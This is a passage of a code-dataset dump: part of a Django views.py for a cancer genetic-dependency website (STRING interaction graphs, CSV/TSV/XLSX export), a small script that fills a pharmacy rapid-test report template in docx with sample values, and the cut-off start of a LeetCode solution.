\"9606.ENSP00000363021;9606.ENSP00000364815;9606.ENSP00000379888\") and their corresponding gene_names as gene_list (eg. 
\"RPA2;VARS;RPS8\").\n Could just receive:\n - receive protein_list and lookup the corresponding gene_names in Gene table\n - or receive gene_list and lookup the corresponding protein ids in the Gene table\n NOTE: There is a {% csrf_token %} in the index.html template for this cytoscape post form, so may beed to add a @csrf_protect decorator.\n \"\"\"\n if (protein_list is None) or (protein_list == ''):\n protein_list = post_or_get_from_request(request,'protein_list')\n\n if (gene_list is None) or (gene_list == ''):\n gene_list = post_or_get_from_request(request,'gene_list')\n \n success, response = stringdb_interactions(required_score, protein_list) # Fetches list of actual interactions\n \n if not success: return plain_error('ERROR: '+response)\n\n protein_list = protein_list.split(';')\n gene_list = gene_list.split(';')\n if len(protein_list) != len(gene_list):\n return plain_error('ERROR: lengths of gene_list and protein_list are different')\n\n # Create a dictionary to check later if returned protein was in original list, and what the gene_name was for that protein_id: \n initial_nodes = dict()\n for i in range(0, len(protein_list)):\n initial_nodes[protein_list[i]] = gene_list[i]\n \n nodes = dict() # The protein nodes for cytoscape\n edges = dict() # The edges for cytoscape\n err_msg = ''\n for line in response:\n # if line:\n cols = line.rstrip().split(\"\\t\")\n if len(cols)<2: \n err_msg += \"\\nNum cols = %d (expected >=2) in response line: '%s'\" %(len(cols),line.rstrip())\n continue\n \n protein1 = cols[0].replace('string:', '') # as ids are prefixed with 'string:'\n if protein1 in initial_nodes:\n nodes[ protein1.replace('9606.', '') ] = True # remove the human tax id\n else: err_msg += \"\\n*** Protein1 returned as '%s' is not in original list ***\" %(protein1)\n\n protein2 = cols[1].replace('string:', '')\n if protein2 in initial_nodes:\n nodes[ protein2.replace('9606.', '') ] = True\n else: err_msg += \"\\n*** Protein2 returned as '%s' is not in original list ***\" %(protein2)\n\n edge = protein1+'#'+protein2\n edge_reversed = protein2+'#'+protein1\n if edge not in edges and edge_reversed not in edges:\n edges[edge] = True\n\n # node_list = sorted(nodes)\n if err_msg != '':\n print(err_msg)\n return plain_error('ERROR:'+err_msg)\n\n # Convert node list of protein_ids, to list of gene_names:\n for protein in protein_list: # Can't use 'initial_nodes' here as it will be updated\n initial_nodes[protein.replace('9606.', '')] = initial_nodes.pop(protein)\n \n node_list = []\n for protein in nodes:\n node_list.append(initial_nodes[protein])\n \n edge_list = [] # Will be an array of tuples.\n for edge in edges:\n proteins = edge.split('#')\n if len(proteins) != 2:\n err_msg += \"\\n**** Expected two proteins in edge, but got: \"+edge\n elif proteins[0].replace('9606.', '') not in initial_nodes:\n err_msg += \"\\n**** Protein1 %s in edge %s, isn't in the initial_nodes: %s\" %(proteins[0],edge,initial_nodes)\n elif proteins[1].replace('9606.', '') not in initial_nodes:\n err_msg += \"\\n**** Protein2 %s in edge %s, isn't in the initial_nodes: %s\" %(proteins[1],edge,initial_nodes)\n else: \n node1 = initial_nodes[proteins[0].replace('9606.', '')]\n node2 = initial_nodes[proteins[1].replace('9606.', '')]\n edge_list.append( ( node1, node2 ) )\n\n if err_msg != '':\n print(err_msg)\n return plain_error('ERROR:'+err_msg)\n \n context = {'node_list': node_list, 'edge_list': edge_list}\n return render(request, 'gendep/cytoscape.html', context)\n\n\n \ndef gene_info(request, gene_name):\n 
try: \n data = gene_info_as_dictionary( Gene.objects.get(gene_name=gene_name) )\n data['success'] = True # Add success: True to the json response.\n return JsonResponse(data, safe=False)\n \n except ObjectDoesNotExist: # Not found by the objects.get()\n return json_error(\"Gene '%s' NOT found in Gene table\" %(gene_name))\n\n \ndef show_study(request, study_pmid):\n requested_study = get_object_or_404(Study, pk=study_pmid)\n # requested_study = get_object_or_404(Study, pk='Pending001') # Temporary for now.\n return render(request, 'gendep/study.html', {'study': requested_study})\n\ndef about(request):\n return render(request, 'gendep/about.html')\n\ndef tutorial(request):\n return render(request, 'gendep/tutorial.html')\n\n\ndef drivers(request):\n driver_list = build_driver_list('driverspage')\n histotype_list = Dependency.HISTOTYPE_CHOICES\n study_list = Study.objects.order_by('pmid') \n context = {'driver_list': driver_list, 'histotype_list': histotype_list, 'study_list': study_list}\n return render(request, 'gendep/drivers.html', context)\n\ndef targets(request):\n target_list = Gene.objects.filter(is_target=True).order_by('gene_name') # Needs: (is_target=True), not just: (is_target) \n context = {'target_list': target_list}\n return render(request, 'gendep/targets.html', context)\n \ndef tissues(request):\n histotype_list = Dependency.HISTOTYPE_CHOICES\n context = {'histotype_list': histotype_list}\n return render(request, 'gendep/tissues.html', context)\n \ndef studies(request):\n # study_list = Study.objects.order_by('pmid')\n # Could also add driver names lists in this query:\n study_list = Study.objects.raw(\"SELECT S.pmid, S.title, S.authors, S.experiment_type, S.journal, S.pub_date, S.num_targets, \"\n + \"COUNT(DISTINCT D.driver) AS num_drivers, \" # Or change to driver_entrez ?\n + \"COUNT(DISTINCT D.histotype) AS num_histotypes, \" \n + group_concat('D.histotype') + \" AS histotype_list, \"\n + \"COUNT(DISTINCT D.target) AS num_targets_in_db \" # Not displayed at present\n + \"FROM gendep_dependency D INNER JOIN gendep_study S ON (D.pmid = S.pmid) \"\n + \"GROUP BY D.pmid ORDER BY S.pmid ASC\"\n )\n histotype_list = Dependency.HISTOTYPE_CHOICES \n context = {'study_list': study_list, 'histotype_list': histotype_list}\n return render(request, 'gendep/studies.html', context)\n\ndef faq(request):\n current_url = request.META['HTTP_HOST'] # See download_dependencies_as_csv_file() for other, maybe better, ways to obtain current_url\n context = {'current_url': current_url}\n return render(request, 'gendep/faq.html', context)\n \ndef contact(request):\n return render(request, 'gendep/contact.html')\n\ndef news(request):\n # news_list = News.objects.filter(deleted=False).order_by('-id') # for reverse id order (ie. most recently posted is first.)\n \n # news_list = News.objects.order_by('-id') # for reverse id order (ie. 
most recently posted is first.)\n # Unused code for news template: {% if news.img_filename not empty %}{% if news.img_link %}{% endif %}{% if news.img_link %}{% endif %}{% endif %}\n # Want the list in reverse order:\n \"\"\"\n This news array is no longer needed as now editing the static News page directly:\n news_list = (\n {'id':'4', 'content':'Added data from Meyers(2017).', 'first_posted':'16-Nov-2017', 'last_edited':'16-Nov-2017'},\n {'id':'3', 'content':'Added Fifty additional driver genes.', 'first_posted':'23-Oct-2017', 'last_edited':'23-Oct-2017'},\n {'id':'2', 'content':'Data added from the McDonald(2017) [Project DRIVE ATARiS] and Tsherniak(2017) [Project Achilles v2.20.2] studies.', 'first_posted':'16-Oct-2017', 'last_edited':'16-Oct-2017'},\n {'id':'1', 'content':'The manuscript describing CancerDG.org is available here.', 'first_posted':'14-July-2014', 'last_edited':'14-July-2014'},\n )\n context = {'news_list': news_list}\n \"\"\"\n context = {}\n return render(request, 'gendep/news.html', context)\n # If in admin mode then can edit the above news items? - ie. pass an extra parameter\n\ndef download(request):\n # download_list = Download.objects.filter(deleted=False).order_by('-id') # for reverse id order (ie. most recently posted is first.)\n \n # download_list = Download.objects.order_by('-id') # for reverse id order (ie. most recently posted is first.)\n # Unused code for news template: {% if news.img_filename not empty %}{% if news.img_link %}{% endif %}{% if news.img_link %}{% endif %}{% endif %}\n \n # Want the list in reverse order:\n \"\"\"\n This download list is no longer needed as now editing the static Downloads page directly: \n download_list = (\n {'id':'12', 'type':'SQLite Database of All dependencies', 'filename':'all_dependencies_16Nov2017.sqlite3.xz', 'date_created':'16-Nov-2017', 'changes':'Added Meyers(2017) data'},\n {'id':'11', 'type':'CSV text file of All dependencies', 'filename':'all_dependencies_16Nov2017.csv.xz', 'date_created':'16-Nov-2017', 'changes':'Added Meyers(2017) data'},\n {'id':'10', 'type':'CSV text file of Multi-hit dependencies', 'filename':'multihit_dependencies_16Nov2017.csv.xz', 'date_created':'16-Nov-2017', 'changes':'Added Meyers(2017) data'},\n {'id':'9', 'type':'SQLite Database of All dependencies', 'filename':'all_dependencies_23Oct2017.sqlite3.xz', 'date_created':'23-Oct-2017', 'changes':'Added Fifty additional driver genes'},\n {'id':'8', 'type':'CSV text file of All dependencies', 'filename':'all_dependencies_23Oct2017.csv.xz', 'date_created':'23-Oct-2017', 'changes':'Added Fifty additional driver genes'},\n {'id':'7', 'type':'CSV text file of Multi-hit dependencies', 'filename':'multihit_dependencies_23Oct2017.csv.xz', 'date_created':'23-Oct-2017', 'changes':'Added Fifty additional driver genes'},\n {'id':'6', 'type':'SQLite Database of All dependencies', 'filename':'all_dependencies_17Oct2017.sqlite3.xz', 'date_created':'17-Oct-2017', 'changes':'Added McDonald(2017) and Tsherniak(2017) data'},\n {'id':'5', 'type':'CSV text file of All dependencies', 'filename':'all_dependencies_17Oct2017.csv.xz', 'date_created':'17-Oct-2017', 'changes':'Added McDonald(2017) and Tsherniak(2017) data'},\n {'id':'4', 'type':'CSV text file of Multi-hit dependencies', 'filename':'multihit_dependencies_17Oct2017.csv.xz', 'date_created':'17-Oct-2017', 'changes':'Added McDonald(2017) and Tsherniak(2017) data'},\n {'id':'3', 'type':'SQLite Database of All dependencies', 'filename':'all_dependencies_1Apr2017.sqlite3.xz', 'date_created':'1-Apr-2017', 
'changes':'Original data'},\n {'id':'2', 'type':'CSV text file of All dependencies', 'filename':'all_dependencies_1Apr2017.csv.xz', 'date_created':'1-Apr-2017', 'changes':'Original data'},\n {'id':'1', 'type':'CSV text file of Multi-hit dependencies', 'filename':'multihit_dependencies_1Apr2017.csv.xz', 'date_created':'1-Apr-2017', 'changes':'Original data'},\n )\n context = {'download_list': download_list}\n \"\"\"\n \n context = {}\n return render(request, 'gendep/download.html', context)\n # If in admin mode then can edit the above news items? - ie. pass an extra parameter\n\n\"\"\"\ndef edit_news(request):\n news_list = News.objects.filter(deleted=False).order_by('-id') # for reverse id order (ie. most recently posted is first.)\n # Unused code for news template: {% if news.img_filename not empty %}{% if news.img_link %}{% endif %}{% if news.img_link %}{% endif %}{% endif %}\n context = {'news_list': news_list}\n return render(request, 'gendep/news.html', context)\n\"\"\"\n\n\nsearch_by_driver_column_headings_for_download = ['Dependency', 'Dependency description', 'Entrez_id', 'Ensembl_id', 'Ensembl_protein_id', 'Dependency synonyms', 'Wilcox P-value', 'Effect size', 'Z diff', 'Tissue', 'Study', 'PubMed Id', 'Experiment Type', 'Multiple hit', 'String interaction', 'Inhibitors', 'Boxplot link'] \nsearch_by_target_column_headings_for_download = ['Driver', 'Driver description', 'Entrez_id', 'Ensembl_id', 'Ensembl_protein_id', 'Driver synonyms', 'Wilcox P-value', 'Effect size', 'Z diff', 'Tissue', 'Study', 'PubMed Id', 'Experiment Type', 'Multiple hit', 'String interaction', 'Inhibitors', 'Boxplot link']\n\n\ndef download_dependencies_as_csv_file(request, search_by, entrez_id, histotype_name, study_pmid, delim_type='csv'):\n \"\"\" Creates then downloads the current dependency result table as a tab-delimited file.\n The download get link needs to contain: search_by, gene, tissue, study parameters.\n\n In Windows at least, 'csv' files are associated with Excel, so will be opened by Excel. \n To also associate a '.tsv' file with excel: In your browser, create a helper preference associating file type 'text/tab-separated values' and file extensions 'tsv' with application 'Excel'. 
Pressing Download will then launch Excel with the '.tsv' data file.\n \n ***** Remember to add to the select_related lists below if other columns are required for output.\n \"\"\"\n \n # mimetype = html_mimetype # was: 'application/json'\n \n # see: http://stackoverflow.com/questions/6587393/resource-interpreted-as-document-but-transferred-with-mime-type-application-zip\n \n # For downloading large csv files, can use streaming: https://docs.djangoproject.com/en/1.9/howto/outputting-csv/#streaming-large-csv-files\n \n # request_method = request.method # 'POST' or 'GET'\n # if request_method != 'GET': return HttpResponse('Expected a GET request, but got a %s request' %(request_method), html_mimetype)\n # search_by = request.GET.get('search_by', \"\") # It's an ajax POST request, rather than the usual ajax GET request\n # gene_name = request.GET.get('gene', \"\")\n # histotype_name = request.GET.get('histotype', \"ALL_HISTOTYPES\")\n # study_pmid = request.GET.get('study', \"ALL_STUDIES\")\n\n search_by_driver = is_search_by_driver(search_by) # Checks is valid and returns true if search_by='driver'\n\n # *** Remember to add to these select_related lists if other columns are required for output:\n RAW = True\n if RAW:\n error_msg, dependency_list = build_rawsql_dependency_query(search_by, entrez_id, histotype_name, study_pmid, order_by='wilcox_p', query_type='dependency_gene_study') \n else: \n select = 'target' if search_by_driver else 'driver' \n # select_related = [ 'target__inhibitors', search_by, 'study' ] if search_by_driver else [ 'driver__inhibitors', search_by, 'study' ] # Could add 'target__ensembl_protein_id' or 'driver__ensembl_protein_id' \n # But for a more precise query (and so faster as retrieves fewer columns) is:\n select_related = [ select+'__gene_name', select+'__full_name', select+'__entrez_id', select+'__ensembl_id', select+'__ensembl_protein_id', select+'__prevname_synonyms', \n 'study__short_name', 'study__experiment_type', 'study__title' ] # don't need 'study__pmid' (as is same as d.study_id)\n error_msg, dependency_list = build_dependency_query(search_by, entrez_id, histotype_name, study_pmid, order_by='wilcox_p', select_related=select_related) # using 'select_related' will include all the Gene info for the target/driver in one SQL join query, rather than doing multiple subqueries later.\n \n if error_msg != '': return html_error(\"Error: \"+error_msg)\n\n # print(\"Query SQL:\",dependency_list.query)\n \"\"\"\nQuery SQL:\n\nRaw SQL would be:\n\nSELECT \n \"gendep_dependency\".\"id\", \"gendep_dependency\".\"driver_name\", \"gendep_dependency\".\"target_name\", \"gendep_dependency\".\"mutation_type\", \"gendep_dependency\".\"wilcox_p\", \"gendep_dependency\".\"effect_size\", \"gendep_dependency\".\"za\", \"gendep_dependency\".\"zb\", \"gendep_dependency\".\"zdiff\", \"gendep_dependency\".\"interaction\", \"gendep_dependency\".\"pmid\", \"gendep_dependency\".\"study_table\", \"gendep_dependency\".\"histotype\", \"gendep_dependency\".\"boxplot_data\",\n T3.\"gene_name\", T3.\"original_name\", T3.\"is_driver\", T3.\"is_target\", T3.\"full_name\", T3.\"ensembl_id\", T3.\"ensembl_protein_id\", T3.\"entrez_id\", T3.\"cosmic_id\", T3.\"cancerrxgene_id\", T3.\"omim_id\", T3.\"uniprot_id\", T3.\"vega_id\", T3.\"hgnc_id\", T3.\"prevname_synonyms\", T3.\"driver_num_studies\", T3.\"driver_study_list\", T3.\"driver_num_histotypes\", T3.\"driver_histotype_list\", T3.\"driver_num_targets\", T3.\"target_num_drivers\", T3.\"target_num_histotypes\", T3.\"inhibitors\", 
T3.\"ncbi_summary\",\n \"gendep_study\".\"pmid\", \"gendep_study\".\"code\", \"gendep_study\".\"short_name\", \"gendep_study\".\"title\", \"gendep_study\".\"authors\", \"gendep_study\".\"experiment_type\", \"gendep_study\".\"abstract\", \"gendep_study\".\"summary\", \"gendep_study\".\"journal\", \"gendep_study\".\"pub_date\", \"gendep_study\".\"num_drivers\", \"gendep_study\".\"num_histotypes\", \"gendep_study\".\"num_targets\"\nFROM \"gendep_dependency\"\nINNER JOIN \"gendep_gene\" T3 ON (\"gendep_dependency\".\"target\" = T3.\"gene_name\")\nINNER JOIN \"gendep_study\" ON (\"gendep_dependency\".\"pmid\" = \"gendep_study\".\"pmid\")\nWHERE (\"gendep_dependency\".\"driver_name\" = ERBB2 AND \"gendep_dependency\".\"histotype\" = PANCAN AND \"gendep_dependency\".\"wilcox_p\" <= 0.05)\nORDER BY \"gendep_dependency\".\"wilcox_p\"\nASC\n\n[08/Jun/2016 01:19:49] \"GET /gendep/download_csv/xlsx/driver/ERBB2/PANCAN/ALL_STUDIES/ HTTP/1.1\" 200 91646\n \"\"\"\n\n# ** Warning: If you are performing queries on MySQL, note that MySQL’s silent type coercion may cause unexpected results when mixing types. If you query on a string type column, but with an integer value, MySQL will coerce the types of all values in the table to an integer before performing the comparison. For example, if your table contains the values 'abc', 'def' and you query for WHERE mycolumn=0, both rows will match. To prevent this, perform the correct typecasting before using the value in a query.\n# from: https://docs.djangoproject.com/en/1.9/topics/db/sql/\n \n \n histotype_full_name = get_histotype_full_name(histotype_name)\n if histotype_full_name is None: return html_error(\"Error: Tissue '%s' NOT found in histotype list\" %(histotype_name))\n \n study = get_study(study_pmid)\n if study is None: return html_error(\"Error: Study pmid='%s' NOT found in Study table\" %(study_pmid))\n\n # Retrieve the host domain for use in the boxplot file links:\n # current_url = request.META['HTTP_HOST']\n\n # Set the deliminators\n # Another alternative would be: csv.unix_dialect\n # csv.excel_tab doesn't display well.\n if delim_type=='csv':\n dialect = csv.excel\n content_type = csv_mimetype # can be called: 'application/x-csv' or 'application/csv'\n elif delim_type=='tsv':\n dialect = csv.excel_tab\n content_type = tab_mimetype\n elif delim_type=='xlsx': # A real Excel file.\n content_type = excel_minetype\n else:\n return html_error(\"Error: Invalid delim_type='%s', as must be 'csv' or 'tsv' or 'xlsx'\"%(delim_type))\n\n timestamp = time.strftime(\"%d-%b-%Y\") # To add time use: \"%H:%M:%S\")\n\n# Maybe better to fetch the gene_name here ....\n\n dest_filename = ('dependency_%s_%s_%s_%s_%s.%s' %(search_by,entrez_id,histotype_name,study_pmid,timestamp,delim_type)).replace(' ','_') # To also replace any spaces with '_' \n # NOTE: Is '.csv' so that Windows will then know to open Excel, whereas if is '.tsv' then won't.\n\n # Create the HttpResponse object with the CSV/TSV header and downloaded filename:\n response = HttpResponse(content_type=content_type) # Maybe use the type for tsv files? 
\n response['Content-Disposition'] = 'attachment; filename=\"%s\"' %(dest_filename)\n\n count = 0\n if not RAW: count = dependency_list.count()\n \n study_name = \"All studies\" if study_pmid=='ALL_STUDIES' else study.short_name\n # Using 'and' rather than comma below as a comma would split the line in csv files:\n # query_text = \"%s='%s' and Tissue='%s' and Study='%s'\" % (search_by.title(), gene_name, histotype_full_name, study_name) \n query_text = \"%s entrez_id='%s' and Tissue='%s' and Study='%s'\" % (search_by.title(), entrez_id, histotype_full_name, study_name)\n \n file_download_text = \"Downloaded from cancergd.org on %s\" %(timestamp)\n \n column_headings = search_by_driver_column_headings_for_download if search_by_driver else search_by_target_column_headings_for_download\n\n if delim_type == 'csv' or delim_type == 'tsv':\n write_csv_or_tsv_file(response, dependency_list, search_by_driver, query_text, column_headings, file_download_text, delim_type, dialect)\n else: # elif delim_type=='xlsx': # Real excel file\n write_xlsx_file(response, dependency_list, search_by_driver, query_text, column_headings, file_download_text)\n \n return response\n \n\n\ndef write_csv_or_tsv_file(response, dependency_list, search_by_driver, query_text, column_headings, file_download_text, delim_type, dialect):\n # delim_type is:'csv' or 'tsv'\n \n import io\n # writer = csv.writer(response, dialect=dialect)\n response_stringio = io.StringIO()\n writer = csv.writer(response_stringio, dialect=dialect)\n # Maybe: newline='', Can add: quoting=csv.QUOTE_MINIMAL, or csv.QUOTE_NONE, or csv.QUOTE_NONNUMERIC; Dialect.delimiter, Dialect.lineterminator\n\n writer.writerows([\n # [\"\",file_description,], # Added extra first column so Excel knows from first row that is CSV. 
BUT we don't know the row count here, so this will be prepended at the end to the html response.\n [\"\",file_download_text,],\n [\"\",],\n ]) # Note: needs the comma inside each square bracket to make python interpret each line as a list rather than a string\n\n writer.writerow(column_headings) # The writeheader() with the 'fieldnames=' parameter is only for the DictWriter object.\n\n # Now write the dependency rows:\n count = 0\n for d in dependency_list: # Not using iterator() as count() above will already have run the query, so is cached, as the rawsql doesn't support iterator()\n count+=1 \n # If could use 'target AS gene' or 'driver AS gene' in the django query then would need only one output:\n # Cannot use 'gene_id' as a variable, as that will refer to the primary key of the Gene table, so returns a tuple.\n# gene_symbol = d.target_id if search_by_driver else d.driver_id # d.target_id but returns name as a tuple, # same as: d.target.gene_name\n# gene_symbol = d.target_name_id if search_by_driver else d.driver_name_id # d.target_id but returns name as a tuple, # same as: d.target.gene_name \n \n# As using RawSQL then the following aren't needed: \n# gene_symbol= d.target.gene_name # d.target_id but returns name as a tuple, # same as: d.target.gene_name\n# full_name = d.target.full_name\n# entrez_id = d.target.entrez_id\n# ensembl_id = d.target.ensembl_id\n# protein_id = d.target.ensembl_protein_id\n# synonyms = d.target.prevname_synonyms\n# inhibitors = d.target.inhibitors\n# else: # search_by target\n# gene_symbol= d.driver.gene_name # d.driver_id, # same as: d.driver.gene_name\n# full_name = d.driver.full_name\n# entrez_id = d.driver.entrez_id\n# ensembl_id = d.driver.ensembl_id\n# protein_id = d.driver.ensembl_protein_id\n# synonyms = d.driver.prevname_synonyms\n# inhibitors = d.driver.inhibitors\n #print(gene_symbol, d.target.gene_name)\n \n# print(help(d))\n\n# for x in d.__dict__.keys():\n# if not x.startswith('_'):\n# print(x,d.__dict__[x])\n# print(\"\") \n\n writer.writerow([\n d.gene_name, d.full_name, d.entrez_id, d.ensembl_id, d.ensembl_protein_id, d.prevname_synonyms,\n format(d.wilcox_p, \".1e\").replace(\"e-0\", \"e-\"),\n format(d.effect_size*100, \".1f\"), # As a percentage with 1 decimal place\n format(d.zdiff,\".2f\"), # Usually negative\n Dependency.histotype_full_name(d.histotype), # was: d.get_histotype_display()\n d.short_name, d.study_id, d.experiment_type,\n d.multi_hit, \n d.interaction,\n d.inhibitors\n ])\n # d.study_id is same as 'd.study.pmid' \n # Could add weblinks to display the SVG boxplots by pasting the link into a webbrowser:\n # this 'current_url' is a temporary fix: (or use: StaticFileStorage.url )\n # 'http://'+current_url+'/static/gendep/boxplots/'+d.boxplot_filename()\n\n \n # Finally close the StringIO file:\n file_description = \"A total of %d dependencies were found for: \" %(count) + query_text\n # Start with a comma or tab to add an extra first column so Excel knows from the first row that this is CSV.\n # The \"\\n\" could be \"\\r\\n\" if the windows dialect of the csv writer was used:\n response.write( (\",\" if delim_type=='csv' else \"\\t\") + file_description + \"\\n\" + response_stringio.getvalue() ) # getvalue() similar to: response_stringio.seek(0); response_stringio.read()\n response_stringio.close() # To free the memory.\n\n \n \n\ndef write_xlsx_file(response, dependency_list, search_by_driver, query_text, column_headings, file_download_text): \n# elif delim_type=='xlsx': # Real excel file\n\n import xlsxwriter # need to install this 'xlsxwriter' python module\n\n # An 
advantage of the Excel format is that if you import a tsv file, Excel changes eg. MARCH10 or SEP4 to a date, whereas creating the Excel file directly doesn't\n # Also can add formatting, better url links, and include box-plot images.\n # Can write directly to the response which is a file-like object. (Alternatively can write to io.stringio first.)\n workbook = xlsxwriter.Workbook(response, {'in_memory': True})\n # As output is small, {'in_memory': True} avoids using temp files on the server, and avoids the error: \"HttpResponse has no attribute seek\"\n # or: with xlsxwriter.Workbook(iobytes_output, {'in_memory': True}) as workbook: (then don't need to close() it)\n \n # From: https://groups.google.com/forum/#!topic/python-excel/0vWPLht7K64\n # Change the default font from Calibri 11 to Arial 10 (as the Mac Numbers app doesn't have Calibri so needs to convert to an MS font):\n workbook.formats[0].font_name = 'Arial'\n workbook.formats[0].font_size = 10\n \n ws = workbook.add_worksheet() # can have an optional sheet_name parameter\n yellow = '#FFFFEE' # a light yellow\n bold = workbook.add_format({'bold': True}) # Add a bold format to use to highlight cells.\n # bold_cyan = workbook.add_format({'bold': True, 'bg_color': 'cyan'}) # Add a bold cyan format.\n # bold_yellow = workbook.add_format({'bold': True, 'bg_color': yellow}) # Add a bold yellow format.\n # bg_yellow = workbook.add_format({'bg_color': yellow})\n # But when using a background colour it hides the vertical grid lines that separate the cells\n align_center = workbook.add_format({'align':'center'})\n exponent_format = workbook.add_format({'num_format': '0.00E+00', 'align':'center'}) # For wilcox_p (eg 1 x 10^-4).\n percent_format = workbook.add_format({'num_format': '0.00\"%\"', 'align':'center'}) # For effect_size.\n two_decimal_places = workbook.add_format({'num_format': '0.00', 'align':'center'}) # For Z-diff.\n\n \n # can also set border formats using: set_bottom(), set_top(), set_left(), set_right()\n # also can set cell bg colours (eg: 'bg_color'), etc http://xlsxwriter.readthedocs.org/format.html\n\n description_row = 1 # As we create the description at the end when the count is available.\n # ws.write_string( description_row, 1, file_description )\n ws.write_string( 2, 1, file_download_text )\n ws.write_row ( 4, 0, column_headings, bold)\n # ws.set_row(row, None, bold) # To make the title row bold - but already set to bold above in write_row\n ws.set_column(0, 0, 12) # To make the Gene name column (col 0) a bit wider\n ws.set_column(1, 1, 35) # To make the Description column (col 1) wider\n ws.set_column(3, 4, 16) # To make the ensembl ids (col 3 and 4) wider\n ws.set_column(5, 5, 35) # To make the Synonyms column (col 5) wider\n ws.set_column(6, 13, 11) # To make columns 6 to 13 a bit wider\n ws.set_column(14, 14, 14) # To make Experiment_type (col 14) a bit wider\n row = 4 # The last row written\n\n # Now write the dependency rows:\n count = 0\n for d in dependency_list: # Not using iterator() as count() above will already have run the query, so is cached, as the rawsql doesn't support iterator()\n count+=1\n # If could use 'target AS gene' or 'driver AS gene' in the django query then would need only one output: \n # Cannot use 'gene_id' as a variable, as that will refer to the primary key of the Gene table, so returns a tuple.\n # gene_symbol = d.target_id if search_by_driver else d.driver_id # d.target_id but returns name as a tuple, # same as: d.target.gene_name\n \n row += 1\n\n ws.write_string(row, 0, d.gene_name, bold)\n ws.write_string(row, 1, d.full_name)\n ws.write_string(row, 2, 
d.entrez_id)\n ws.write_string(row, 3, d.ensembl_id)\n ws.write_string(row, 4, d.ensembl_protein_id)\n ws.write_string(row, 5, d.prevname_synonyms)\n ws.write_number(row, 6, d.wilcox_p, exponent_format)\n ws.write_number(row, 7, d.effect_size, percent_format)\n ws.write_number(row, 8, d.zdiff, two_decimal_places)\n ws.write_string(row, 9, Dependency.histotype_full_name(d.histotype))\n ws.write_string(row, 10, d.short_name)\n ws.write_url( row, 11, url=Study.url(d.study_id), string=d.study_id, tip='PubmedId: '+d.study_id+' : '+d.title) # cell_format=bg_yellow # d.study_id is same as 'd.study.pmid'\n # WAS: ws.write_url( row, 11, url=d.study.url(), string=d.study_id, tip='PubmedId: '+d.study_id+' : '+d.study.title) # cell_format=bg_yellow # d.study_id is same as 'd.study.pmid'\n ws.write_string(row, 12, d.experiment_type)\n ws.write_string(row, 13, d.multi_hit)\n ws.write_string(row, 14, d.interaction, align_center)\n ws.write_string(row, 15, d.inhibitors)\n # WAS: ws.write_string(row, 16, d.study.summary)\n \n # ADD THE FULL STATIC PATH TO THE url = .... BELOW:\n # ws.write_url( row, 14, url = 'gendep/boxplots/'+d.boxplot_filename, string=d.boxplot_filename, tip='Boxplot image')\n # ws.insert_image(row, col, STATIC.....+d.boxplot_filename [, options]) # Optionally add the box-plots to excel file.\n\n # Finally: \n file_description = \"A total of %d dependencies were found for: \" %(count) + query_text\n\n # Close the Excel file:\n ws.write_string( description_row, 1, file_description )\n workbook.set_properties({\n 'title': file_description,\n 'subject': 'Cancer Genetic Dependencies',\n 'author': 'CancerGD.org',\n 'manager': 'Dr. Colm Ryan',\n 'company': 'Systems Biology Ireland',\n 'category': '',\n 'keywords': 'Sample, Example, Properties',\n 'comments': 'Created with Python and XlsxWriter. '+file_download_text,\n 'status': '',\n 'hyperlink_base': '',\n })\n workbook.close() # must close to save the contents.\n \n # xlsx_data = output.getvalue()\n # response.write(iobytes_output.getvalue()) # maybe add: mimetype='application/ms-excel'\n # or:\n # output.seek(0)\n # response = HttpResponse(output.read(), content_type=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\")\n\n","repo_name":"cancergenetics/cancergd","sub_path":"gendep/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":99796,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"38742613474","text":"import re\nfrom docx import Document\nfrom docx2pdf import convert\n\nfilename = \"data/TROD_angine_docx.docx\"\n\ndictionary_word = {\"identifiant_pharmacie\": \"Pharmacie du Bois plage en ré\",\n \"nom_pharmacien\": \"Jean Chatenet\",\n \"date_heure_test\": \"22/09/2023 à 14h30\",\n \"nom_patient\": \"tnndd92\",\n \"age_patient\": \"19\",\n \"p_ordo\": \"Non\",\n \"score_mac\": \"3\",\n \"1score\": \"1\",\n \"2score\": \"1\",\n \"3score\": \"1\",\n \"4score\": \"0\",\n \"5score\": \"0\",\n \"6score\": \"0\",\n \"7score\": \"3\",\n \"nom_test\": \"Pfizer TROD Angine\",\n \"lot_trod\": \"AK56FD\",\n \"date_trod\": \"04/2026\",\n \"ecouvillon_utilise\": \"celui prévu dans la boite\",\n \"resultattest\": \"POSITIF\",\n \"orientation_med\": \"Oui\",\n \"deliv_antibio\": \"Non\",\n \"trait_sympto\": \"Non\",\n \"control_int\": \"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus.\",\n \"control_ext\": \"Lorem ipsum dolor sit amet, consectetur adipiscing elit. 
Sed non risus.\",\n \"date_val\": \"01/01/2023\"\n }\n\n\ndef docx_replace_regex(doc_obj, regex, replace):\n for p in doc_obj.paragraphs:\n if regex.search(p.text):\n inline = p.runs\n for i in range(len(inline)):\n if regex.search(inline[i].text):\n text = regex.sub(replace, inline[i].text)\n inline[i].text = text\n for table in doc_obj.tables:\n for row in table.rows:\n for cell in row.cells:\n docx_replace_regex(cell, regex, replace)\n\n\ndef replace_in_word(filename, dictionary):\n doc = Document(filename)\n for word, replacement in dictionary.items():\n word_re = re.compile(word)\n docx_replace_regex(doc, word_re, replacement)\n doc.save('data/outputs/result2.docx')\n convert(\"data/outputs/result2.docx\", \"data/outputs/result2.pdf\")\n return doc\n\n# replace_in_word(filename, dictionary)\n","repo_name":"thainhienndd/pharmacie_automation","sub_path":"replace_word.py","file_name":"replace_word.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"34508860240","text":"\n# https://leetcode.com/problems/maximum-length-of-repeated-subarray/discuss/768495/longest-common-substring-python-dp-solution\n\n# https://leetcode.com/problems/longest-common-subsequence/discuss/598508/Python-DP-solution-with-Explanation-%2B-Thinking-process-%2B-Diagram\n\n# https://leetcode.com/problems/longest-common-subsequence/discuss/598285/Python-faster-than-90\n\nclass Solution:\n\tdef findLength(self, A , B) -> int:\n\n\t\tn = len(A)\n\t\tm = len(B)\n\t\t\n\t\t#Edge cases.\n\t\tif m == 0 or n == 0:\n\t\t\treturn 0\n\n\t\tif n == 1 and m == 1:\n\t\t\tif A[0] == B[0]:\n\t\t\t\treturn 